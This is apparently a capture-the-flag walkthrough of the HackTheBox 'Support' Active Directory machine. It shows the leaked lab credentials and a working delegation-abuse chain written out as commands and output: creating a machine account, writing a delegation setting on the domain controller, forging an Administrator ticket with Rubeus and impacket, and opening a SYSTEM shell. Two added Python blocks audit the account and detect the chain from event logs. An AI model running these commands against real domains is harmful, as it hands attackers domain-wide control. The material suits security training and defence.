Support
Completed on September 7, 2022

Overview
Support, in my opinion, shows things that support teams sometimes do without thinking of the consequences: from exposing the tools they use to developing tools that use cleartext credentials. You will have the opportunity to explore these as well as other misconfigurations in the environment.
References
Enumeration
Service Enumeration
As in every scenario, we first need to get to know our target. We start the enumeration by finding the open ports on the host and then enumerating each service.
Finding Open Ports:

As you might know, we are looking at an active directory environment.

Through LDAP we found the domain name, but we can explore further.
LDAP (TCP 389) Enumeration:
As always, let's find out what we can get through LDAP.

Well, basically LDAP is not accessible without valid credentials. Let's proceed to the next service.
Kerberos (TCP 88) Enumeration:
Through Kerberos, we can only attempt to bruteforce user accounts at this point in the exercise to find valid ones.

From the accounts found, excluding the default ones, we can see that support@support.htb and management@support.htb exist. Anyone who has worked in an enterprise environment can easily guess these are shared accounts, which should be avoided.
SMB (TCP 445) Enumeration:
A basic step when enumerating SMB is to attempt a null session and find out what it allows.

The only share that we can attempt to access is support-tools.

From these tools, the only unrecognized one is UserInfo.exe.zip. We need to unzip the file and test it.
Gaining Access
Looking at the unzipped files, we need to find a way to run the Windows executable; for this, we will use mono.

Let's use it to retrieve user information for the accounts we found through Kerberos. Since the tool retrieves user information, it must be connecting to a service, so let's capture some packets while it runs:

And the packet capture reveals another account and its password:

Found potentially hardcoded credentials: ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
Our first test of this credential would be to use it through Bloodhound and in turn enumerate the domain further:

Looking at the relationship between 'support' and the domain controller shows this account inherits the 'GenericAll' delegated right through its membership of 'Shared Support Accounts'.

Also, we can now pull a list of users from the domain:

Through LDAP, we will enumerate the 'support' account and its attributes:
┌──(kali 👿 kali)-[~/…/Support]
└─$ ldapsearch -x -H ldap://support.htb:389 -D 'SUPPORT\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=support,CN=Users,DC=support,DC=htb' -s base
# extended LDIF
#
# LDAPv3
# base <CN=support,CN=Users,DC=support,DC=htb> with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 12630
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 1
codePage: 0
countryCode: 0
badPasswordTime: 133069989459107223
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: support
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111201.0Z
dSCorePropagationData: 16010101000000.0Z
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
The info attribute contains account information related to credentials: support:Ironside47pleasure40Watchful
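The attributes in the output above can be decoded offline. This parser is added here as an illustration and is not part of the original writeup: it reads a constructed excerpt of the ldapsearch output, decodes the objectSid and userAccountControl values, and lists what a reviewer would flag on a shared account (the checks themselves are my assumptions).

```python
import base64
import struct

# Constructed excerpt of the ldapsearch output above (only the lines we decode).
LDIF = """\
dn: CN=support,CN=Users,DC=support,DC=htb
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
userAccountControl: 66048
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
sAMAccountName: support
"""

# Subset of userAccountControl bits relevant to an account review.
UAC_FLAGS = {0x0002: "ACCOUNTDISABLE", 0x0200: "NORMAL_ACCOUNT",
             0x10000: "DONT_EXPIRE_PASSWORD", 0x80000: "TRUSTED_FOR_DELEGATION",
             0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION"}

def parse_ldif(text):
    """Parse LDIF attribute lines into {name: [values]}; '::' marks base64 values."""
    entry = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        if ":: " in line:
            name, value = line.split(":: ", 1)
            value = base64.b64decode(value)
        else:
            name, value = line.split(": ", 1)
        entry.setdefault(name, []).append(value)
    return entry

def sid_to_string(blob):
    """Binary SID: revision, sub-authority count, 48-bit big-endian authority, LE sub-authorities."""
    rev, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, blob, 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))

def decode_uac(value):
    """Names of the userAccountControl bits that are set, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def audit_account(text):
    """Summarise the entry and list review findings for a shared-account policy (assumed checks)."""
    e = parse_ldif(text)
    uac = int(e["userAccountControl"][0])
    sid = sid_to_string(e["objectSid"][0])
    groups = [g.split(",")[0][3:] for g in e.get("memberOf", [])]   # strip "CN=" and the rest of the DN
    findings = []
    if "DONT_EXPIRE_PASSWORD" in decode_uac(uac):
        findings.append("password never expires")
    if "Remote Management Users" in groups:
        findings.append("WinRM access via Remote Management Users")
    if "Shared Support Accounts" in groups:
        findings.append("member of a shared-account group")
    return {"sam": e["sAMAccountName"][0], "sid": sid, "rid": int(sid.rsplit("-", 1)[1]),
            "uac": decode_uac(uac), "groups": groups, "findings": findings}
```

The decoded SID shares its domain part with the objectsid shown later for the domain object, so the same helper also works on the domain's SID.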
Given that the 'support' account is a member of 'Remote Management Users' (the 'CanPSRemote' edge in BloodHound), we can access the system with this account through WinRM:

User flag found:

Privilege Escalation
Resource-Based Constrained Delegation
The rights 'support' inherits through its membership of the 'Shared Support Accounts' group mean the following:
GenericAll: GenericAll = Full Control
The right to create or delete children, delete a subtree, read and write properties, examine children and the object itself, add and remove the object from the directory, and read or write with an extended right.
It provides full rights to the object and all properties, including confidential attributes such as LAPS local Administrator passwords, and BitLocker recovery keys. In many cases, Full Control rights aren’t required, but it’s easier to delegate and get working than determining the actual rights required.
Example: A Server tier group may be delegated Full Control on all Computer objects in an OU that has the computer objects associated with servers. Another common configuration is delegating Full Control on all Computer objects in the Workstations OU for the Desktop Support group, and delegating Full Control on all user objects in the Users OU for the Help Desk.
• Set Execution Policy and Import PowerView

• Checking if user can create new computer objects: ms-ds-machineaccountquota
Run the following (change the values of the parameters of course): Get-DomainObject -Identity "dc=offense,dc=local" -Domain offense.local
*Evil-WinRM* PS C:\Users\support\Downloads> Get-DomainObject -Identity "DC=support,DC=htb" -Domain support.htb
msds-isdomainfor : CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
lockoutobservationwindow : -18000000000
iscriticalsystemobject : True
maxpwdage : -9223372036854775808
msds-alluserstrustquota : 1000
distinguishedname : DC=support,DC=htb
objectclass : {top, domain, domainDNS}
pwdproperties : 1
gplink : [LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=support,DC=htb;0]
name : support
wellknownobjects : {B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=support,DC=htb, B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Program Data,DC=support,DC=htb,
B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=support,DC=htb, B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrincipals,DC=support,DC=htb...}
serverstate : 1
nextrid : 1000
objectsid : S-1-5-21-1677581083-3380853377-188903654
msds-behavior-version : 7
fsmoroleowner : CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
repluptodatevector : {2, 0, 0, 0...}
uascompat : 0
dsasignature : {1, 0, 0, 0...}
ridmanagerreference : CN=RID Manager$,CN=System,DC=support,DC=htb
ntmixeddomain : 0
whenchanged : 9/6/2022 9:08:48 PM
msds-perusertrusttombstonesquota : 10
instancetype : 5
lockoutthreshold : 0
objectguid : 553cd9a3-86c4-4d64-9e85-5146a98c868e
auditingpolicy : {0, 1}
msds-perusertrustquota : 1
systemflags : -1946157056
objectcategory : CN=Domain-DNS,CN=Schema,CN=Configuration,DC=support,DC=htb
dscorepropagationdata : 1/1/1601 12:00:00 AM
otherwellknownobjects : {B:32:683A24E2E8164BD3AF86AC3C2CF3F981:CN=Keys,DC=support,DC=htb, B:32:1EB93889E40C45DF9F0C64D23BBB6237:CN=Managed Service Accounts,DC=support,DC=htb}
creationtime : 133069721280550451
whencreated : 5/28/2022 11:01:46 AM
minpwdlength : 7
msds-nctype : 0
pwdhistorylength : 24
dc : support
msds-masteredby : CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
usncreated : 4099
subrefs : {DC=ForestDnsZones,DC=support,DC=htb, DC=DomainDnsZones,DC=support,DC=htb, CN=Configuration,DC=support,DC=htb}
msds-expirepasswordsonsmartcardonlyaccounts : True
masteredby : CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
lockoutduration : -18000000000
usnchanged : 86045
modifiedcountatlastprom : 0
modifiedcount : 1
forcelogoff : -9223372036854775808
ms-ds-machineaccountquota : 10
minpwdage : -864000000000
As a validation step, we check the domain controller's OS, since the domain functional level must be at least 'Windows Server 2012':
*Evil-WinRM* PS C:\Users\support\Downloads> Get-DomainController
Forest : support.htb
CurrentTime : 9/7/2022 2:52:25 PM
HighestCommittedUsn : 1355255
OSVersion : Windows Server 2022 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : support.htb
IPAddress : ::1
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : dc.support.htb
Partitions : {DC=support,DC=htb, CN=Configuration,DC=support,DC=htb, CN=Schema,CN=Configuration,DC=support,DC=htb, DC=DomainDnsZones,DC=support,DC=htb...}
• Check that the target computer object does not already have the msds-allowedtoactonbehalfofotheridentity attribute set:
*Evil-WinRM* PS C:\Users\support\Downloads> Get-NetComputer | Select-Object -Property name,msds-allowedtoactonbehalfofotheridentity
name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC
MANAGEMENT
• Create a new machine account: for this, we will use Powermad!
*Evil-WinRM* PS C:\Users\support\Downloads> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Downloads> $passwd=ConvertTo-SecureString 'test123' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\support\Downloads> New-MachineAccount -MachineAccount FAKE01 -Password $passwd
[+] Machine account FAKE01 added
*Evil-WinRM* PS C:\Users\support\Downloads> Get-DomainComputer FAKE01
pwdlastset : 9/7/2022 9:41:47 AM
logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=FAKE01,CN=Computers,DC=support,DC=htb
objectclass : {top, person, organizationalPerson, user...}
name : FAKE01
objectsid : S-1-5-21-1677581083-3380853377-188903654-5601
samaccountname : FAKE01$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
accountexpires : NEVER
countrycode : 0
whenchanged : 9/7/2022 4:41:47 PM
instancetype : 4
usncreated : 1355271
objectguid : eaa3207a-d66f-40e9-ad04-59df1c57d84c
lastlogon : 12/31/1600 4:00:00 PM
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=support,DC=htb
dscorepropagationdata : 1/1/1601 12:00:00 AM
serviceprincipalname : {RestrictedKrbHost/FAKE01, HOST/FAKE01, RestrictedKrbHost/FAKE01.support.htb, HOST/FAKE01.support.htb}
ms-ds-creatorsid : {1, 5, 0, 0...}
badpwdcount : 0
cn : FAKE01
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT
whencreated : 9/7/2022 4:41:47 PM
primarygroupid : 515
iscriticalsystemobject : False
usnchanged : 1355273
dnshostname : FAKE01.support.htb
*Evil-WinRM* PS C:\Users\support\Downloads> Set-ADComputer "DC" -PrincipalsAllowedToDelegateToAccount "FAKE01$"
*Evil-WinRM* PS C:\Users\support\Downloads> Get-ADComputer "DC" -Properties PrincipalsAllowedToDelegateToAccount
DistinguishedName : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName : dc.support.htb
Enabled : True
Name : DC
ObjectClass : computer
ObjectGUID : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=FAKE01,CN=Computers,DC=support,DC=htb}
SamAccountName : DC$
SID : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName :
Then, we need to get the target machine's SPNs:
*Evil-WinRM* PS C:\Users\support\Downloads> Get-DomainComputer DC | Select-Object -ExpandProperty serviceprincipalname
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/dc.support.htb
ldap/dc.support.htb/ForestDnsZones.support.htb
ldap/dc.support.htb/DomainDnsZones.support.htb
DNS/dc.support.htb
GC/dc.support.htb/support.htb
RestrictedKrbHost/dc.support.htb
RestrictedKrbHost/DC
RPC/290156e5-22cb-4f1b-9b96-5516d84c363c._msdcs.support.htb
HOST/DC/SUPPORT
HOST/dc.support.htb/SUPPORT
HOST/DC
HOST/dc.support.htb
HOST/dc.support.htb/support.htb
E3514235-4B06-11D1-AB04-00C04FC2DCD2/290156e5-22cb-4f1b-9b96-5516d84c363c/support.htb
ldap/DC/SUPPORT
ldap/290156e5-22cb-4f1b-9b96-5516d84c363c._msdcs.support.htb
ldap/dc.support.htb/SUPPORT
ldap/DC
ldap/dc.support.htb
ldap/dc.support.htb/support.htb
At this point, we need to derive the Kerberos keys of the FAKE01$ machine account and then request a service ticket for the DC impersonating Administrator (S4U2Self followed by S4U2Proxy), which we can use to access the system as the Administrator user:
Using Rubeus to get the machine account hash:
*Evil-WinRM* PS C:\Users\support\Downloads> .\Rubeus.exe hash /password:test123 /user:FAKE01$ /domain:support.htb
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: Calculate Password Hash(es)
[*] Input password : test123
[*] Input username : FAKE01$
[*] Input domain : support.htb
[*] Salt : SUPPORT.HTBhostfake01.support.htb
[*] rc4_hmac : C5A237B7E9D8E708D8436B6148A25FA1
[*] aes128_cts_hmac_sha1 : 7C98F2E0201C3196398561D61583227E
[*] aes256_cts_hmac_sha1 : 269A967C37B89B0EC1955755AC29E8EEE86A8E7B8755C85B2542A9FF5D1B9273
[*] des_cbc_md5 : 94EC131A430B57CE
Retrieving the service ticket as Administrator:
┌──(kali 👿 kali)-[~/…/Support]
└─$ impacket-getST 'support.htb/FAKE01' -dc-ip dc.support.htb -spn ldap/dc.support.htb -impersonate administrator \
-aesKey 269A967C37B89B0EC1955755AC29E8EEE86A8E7B8755C85B2542A9FF5D1B9273
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
Accessing the domain controller as the Administrator user:
┌──(kali 👿 kali)-[~/…/Support]
└─$ KRB5CCNAME=./administrator.ccache \
impacket-smbexec 'support.htb/Administrator@dc.support.htb' -no-pass -k
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.227.255
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>dir c:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 955A-5CBB
Directory of c:\Users\Administrator\Desktop
05/28/2022 04:17 AM <DIR> .
05/28/2022 04:11 AM <DIR> ..
09/06/2022 02:09 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,133,308,928 bytes free
C:\Windows\system32>type c:\Users\Administrator\Desktop\root.txt
6c9ae4********************3965ec
AND we got root!!
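Every step of this chain leaves a trace in the Security log on the DC. The detector below is added here as an illustration and is not part of the original writeup: it correlates constructed sample records shaped like events 4741 (computer account created), 5136 (directory object modified) and 4769 (service ticket requested); the field names follow the event XML, and the allowlists are assumptions.

```python
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
PRIVILEGED = {"administrator"}        # assumed: users whose impersonation is always notable
ADMIN_OPERATORS = {"Administrator"}   # assumed: accounts expected to create computer objects

# Constructed sample events (not real logs from the box). 5136 only appears when the
# object carries an audit SACL; 4769 lists the front-end service in TransmittedServices
# for S4U2Proxy requests.
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "support", "TargetUserName": "FAKE01$"},
    {"EventID": 5136, "SubjectUserName": "support",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14674"},  # value added
    {"EventID": 4769, "TargetUserName": "administrator@SUPPORT.HTB", "ServiceName": "DC$",
     "TransmittedServices": "FAKE01$@SUPPORT.HTB"},   # S4U2Proxy on behalf of FAKE01$
    {"EventID": 4769, "TargetUserName": "support@SUPPORT.HTB", "ServiceName": "DC$",
     "TransmittedServices": "-"},                      # ordinary ticket request, benign
]

def detect(events):
    """Walk the events in order and return alert strings, correlating the three stages."""
    alerts, created = [], {}           # created: machine account -> non-admin creator
    for e in events:
        eid = e["EventID"]
        if eid == 4741 and e["SubjectUserName"] not in ADMIN_OPERATORS:
            created[e["TargetUserName"]] = e["SubjectUserName"]
            alerts.append("4741: non-admin %s created %s (MachineAccountQuota in use)"
                          % (e["SubjectUserName"], e["TargetUserName"]))
        elif (eid == 5136 and e["AttributeLDAPDisplayName"] == RBCD_ATTR
              and e["OperationType"] == "%%14674"):
            sev = "HIGH" if "OU=Domain Controllers" in e["ObjectDN"] else "MEDIUM"
            alerts.append("5136 %s: %s wrote %s on %s"
                          % (sev, e["SubjectUserName"], RBCD_ATTR, e["ObjectDN"]))
        elif eid == 4769 and e.get("TransmittedServices", "-") != "-":
            user = e["TargetUserName"].split("@")[0].lower()
            front = e["TransmittedServices"].split("@")[0]
            if user in PRIVILEGED:
                tag = "RBCD CHAIN" if front in created else "S4U2Proxy"
                alerts.append("4769 %s: %s obtained a ticket as %s for %s"
                              % (tag, front, e["TargetUserName"], e["ServiceName"]))
    return alerts
```

Setting ms-DS-MachineAccountQuota to 0 and auditing writes to the delegation attribute on the Domain Controllers OU removes the first two stages entirely.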